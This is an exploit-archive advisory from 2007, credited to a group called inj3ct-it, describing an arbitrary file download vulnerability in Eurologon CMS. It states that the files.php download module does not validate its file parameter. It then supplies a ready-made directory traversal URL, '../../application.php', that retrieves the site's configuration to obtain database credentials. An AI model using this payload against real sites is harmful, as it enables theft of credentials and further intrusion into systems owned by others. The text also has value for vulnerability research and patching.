[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Eurologon CMS files.php Arbitrary File Download Vulnerability
# Published : 2007-11-27
# Author : KiNgOfThEwOrLd
# Previous Title : Eurologon CMS Multiple Remote SQL Injection Vulnerabilities
# Next Title : PHP-Nuke NSN Script Depository 1.0.0 Remote Source Disclosure Vuln
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |_______ _____/ |_ /_ |/ |_
| |/ | | _(__ <_/ ___ __ ______ | __
| | | | |/ ___| | /_____/ | || |
|___|___| /__| /______ /___ >__| |___||__|
/______| / /
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Eurologon CMS Db credentials disclosure / files download
---------------------------------------------------------------
#By KiNgOfThEwOrLd
---------------------------------------------------------------
PoC
The download module, not correctly check the file parameter, then using
directory traversal we can get all the files hosted in our target web space.
---------------------------------------------------------------
Get Database Credentials
http://[target]/users/files.php?mode=download&file=../../application.php
---------------------------------------------------------------
# www.Syue.com [2007-11-27]